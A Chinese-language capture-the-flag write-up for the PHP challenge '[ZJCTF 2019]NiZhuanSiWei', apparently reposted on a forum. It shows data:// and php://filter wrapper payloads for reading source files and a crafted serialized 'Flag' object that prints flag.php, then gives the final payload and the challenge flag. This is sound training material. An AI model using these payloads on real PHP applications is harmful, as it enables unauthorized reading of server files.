[ZJCTF 2019]NiZhuanSiWei
启动靶机,检察源代码https://img2024.cnblogs.com/blog/3518346/202410/3518346-20241013163337431-1594518316.png
查询file_get_contents()函数这里传入的text必须是个文件且文件内容为welcome to the zjctf
https://img2024.cnblogs.com/blog/3518346/202410/3518346-20241013163638832-174284243.png
这里我们使用data伪协议将内容写入
?text=data://text/plain,welcome to the zjctf
往下看有个正则表达式过滤flag,继承往下
https://img2024.cnblogs.com/blog/3518346/202410/3518346-20241013164152708-2107528479.png
很明显是php的反序列化利用,却没有看到利用类的构造代码,正则过滤了flag.php,我们只能尝试访问useless.php
https://img2024.cnblogs.com/blog/3518346/202410/3518346-20241013164233867-1812390730.png
利用?text=data://text/plain,welcome to the zjctf &file=useless.php没反应
尝试filter伪协议读取
?text=data://text/plain,welcome to the zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php
https://img2024.cnblogs.com/blog/3518346/202410/3518346-20241013165153729-194354872.png
解码后得到useless.php
https://img2024.cnblogs.com/blog/3518346/202410/3518346-20241013165220388-192243072.png
到这里逻辑就清晰了,由于反序列化在正则表达式后,我们只需在反序列化时将file值赋为flag.php,再利用__tostring函数在echo时主动调用的特性将flag.php打印出来
https://img2024.cnblogs.com/blog/3518346/202410/3518346-20241013165647145-1762021604.png
构造如下,只需对file变量赋值 得到O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
https://img2024.cnblogs.com/blog/3518346/202410/3518346-20241013170022368-1769687873.png
最终payload:?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
检察源代码发现flag flag{17e56d67-d376-4aeb-8de3-a411874f6256}
https://img2024.cnblogs.com/blog/3518346/202410/3518346-20241013171020674-1049140763.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]